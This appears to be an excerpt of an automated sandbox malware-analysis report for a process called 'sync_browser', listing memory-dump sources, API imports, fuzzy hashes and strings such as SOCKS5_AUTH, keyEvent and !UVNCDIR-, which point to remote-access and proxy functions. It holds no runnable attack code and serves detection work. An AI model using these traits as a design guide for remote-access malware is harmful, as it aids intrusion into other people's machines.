                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 113790786-0
                                                                                          • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                                          • Instruction ID: bb26a059e9ba9f095b7a37c9cb99d17274938b3d5f264987114994617a86cb29
                                                                                          • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                                                          • Instruction Fuzzy Hash: 23217927E3D60282F660BB51A40077EE2A4EFA1780F544535FA8EC66C2CF3CE888C350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                                          • String ID: SOCKS5_AUTH
                                                                                          • API String ID: 788663964-1698957378
                                                                                          • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                                          • Instruction ID: b4057d19792509be34bb78e900dc027091fe1cdcede3a23117e235f1333fa963
                                                                                          • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                                          • Instruction Fuzzy Hash: FB81282373CA4241E7618729E5402BA6A9DEFA5794F442331FE5EC7AE9EE2CD40DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                                                          • String ID: 0123456789.
                                                                                          • API String ID: 1515065793-2088042752
                                                                                          • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                                          • Instruction ID: d30822b07d154cafe2626d24a109b4647453014779d896b98a649e519a4d4ba8
                                                                                          • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                                          • Instruction Fuzzy Hash: 62415563B246828AEB319F25D8443F96258AF69BA4F045335FE1D876E5EF2CD549C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                                          • String ID: keyEvent$start_event$stop_event
                                                                                          • API String ID: 2894921085-1979648887
                                                                                          • Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                                          • Instruction ID: 1a172f37388e952e18dfcf1ee55cd2d93d20a9465ecd3c8e8fe1b08fb07aec11
                                                                                          • Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                                          • Instruction Fuzzy Hash: CD41492BE39A4391FA20EB54E4547B6A390AFA5744F640036F94ECB7A2CF7DA44CC341
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                                          • String ID:
                                                                                          • API String ID: 3112530957-0
                                                                                          • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                                          • Instruction ID: 221bb846ede36b5da4b601807023621ef43e8a657a048ed13aa1c8859d594aec
                                                                                          • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                                          • Instruction Fuzzy Hash: 744108729146C18AE324DF78E4447A9BBA0F749B18F044939EB699B748DF3DD948CF10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
                                                                                          • String ID: !UVNCDIR-$f
                                                                                          • API String ID: 753559762-4271271459
                                                                                          • Opcode ID: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
                                                                                          • Instruction ID: 6f5c99cb81015562881b8ded1e15f74038af744309834ff7aaa2ec8323c9a4c3
                                                                                          • Opcode Fuzzy Hash: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
                                                                                          • Instruction Fuzzy Hash: 1E41B323A28B8181EB60DF24E8543B96790EB95BA4F040335EA6E8B7E5DF3CD048C710
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E877BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67E813771), ref: 00007FF67E877BFE
                                                                                          • GetLastError.KERNEL32 ref: 00007FF67E813790
                                                                                          • SetLastError.KERNEL32 ref: 00007FF67E8137B2
                                                                                          • FormatMessageA.KERNEL32 ref: 00007FF67E8137EB
                                                                                          • sprintf.LIBCMT ref: 00007FF67E813804
                                                                                            • Part of subcall function 00007FF67E87B240: _errno.LIBCMT ref: 00007FF67E87B258
                                                                                            • Part of subcall function 00007FF67E87B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87B263
                                                                                            • Part of subcall function 00007FF67E813690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136A9
                                                                                            • Part of subcall function 00007FF67E813690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136D1
                                                                                            • Part of subcall function 00007FF67E813690: WriteConsoleA.KERNEL32 ref: 00007FF67E8136EE
                                                                                            • Part of subcall function 00007FF67E813690: WriteFile.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E813725
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                                          • String ID: --$error code 0x%08X
                                                                                          • API String ID: 1897734068-3878996968
                                                                                          • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                                          • Instruction ID: 0e7e97db8bcf202e7294069c3c55ac50d257bdec61546ad2a190601e79071ff0
                                                                                          • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                                          • Instruction Fuzzy Hash: C831B073B28A8181EB20DB65E4143AAA761FB95BA8F544335FB6D876D5DF3CE0098700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: freeinet_addrmalloc
                                                                                          • String ID: 0123456789.$both$local$remote
                                                                                          • API String ID: 2387382576-3366603569
                                                                                          • Opcode ID: 693ffa12aebc96a0796163309a3b3ce82c055d970d3f392e798de053c61bca72
                                                                                          • Instruction ID: a07353eeed0d06f1f6906b077e4a973d4f8a80161a348684f0bb8506eb9bc53f
                                                                                          • Opcode Fuzzy Hash: 693ffa12aebc96a0796163309a3b3ce82c055d970d3f392e798de053c61bca72
                                                                                          • Instruction Fuzzy Hash: 3221C923F2C68245F7109B11D9103786799FBA87D1F589631FA1E8B7E9EE2CD989C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __doserrno_errno
                                                                                          • String ID:
                                                                                          • API String ID: 921712934-0
                                                                                          • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                                          • Instruction ID: aeedce933f2b42894da2a75ea81ac49cb6539ceb90f6d1e4f750412bf44df4e8
                                                                                          • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                                          • Instruction Fuzzy Hash: 0721D423B3C64245F2156FE5D84137DA6516FA27A1F494135FA1C873D3CE7CA449CB60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1973726940-0
                                                                                          • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                                          • Instruction ID: bba0f877ae272662833bb10caa9263b4a2662150aa418fab125afc2a873e893b
                                                                                          • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                                          • Instruction Fuzzy Hash: 6A117226F2DB5182EB149B56B844069A2A8BB5DFD5F044435FE4E83B64DE3CD489C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __doserrno_close_nolock_errno
                                                                                          • String ID:
                                                                                          • API String ID: 186997739-0
                                                                                          • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                                          • Instruction ID: de0d7b663de543544ef2a951b349c51b678ec435b3b25a785aedbf568734d058
                                                                                          • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                                          • Instruction Fuzzy Hash: 5211E123F3864245F2152FA5A88127CA651AFA17A1F59453AF52DC77D3CE7CA448C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Timer$KillMessageModePostQuitWindow
                                                                                          • String ID: d
                                                                                          • API String ID: 3664928928-2564639436
                                                                                          • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                                          • Instruction ID: b71f6bf3013ce55390ec934808e6e22e4d96d654e1b562e09dc319bab341832d
                                                                                          • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                                          • Instruction Fuzzy Hash: 341151A3F2860383F7605B39E8156756298AF64765F484330E92AC56E0EE3C9999CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Long$DialogForegroundItemText
                                                                                          • String ID: Oct 1 2014 21:43:49
                                                                                          • API String ID: 2747855613-2751236551
                                                                                          • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                                          • Instruction ID: 0f19167d52fb31421efae08d0cdc8a9597e46c9725a65a9422d38c99523ce44c
                                                                                          • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                                          • Instruction Fuzzy Hash: F1116036A28B4282E314CB2AE584579A3A5FB95BE0F244131FA8A47B94DF7CD449C740
                                                                                          APIs
                                                                                          Strings
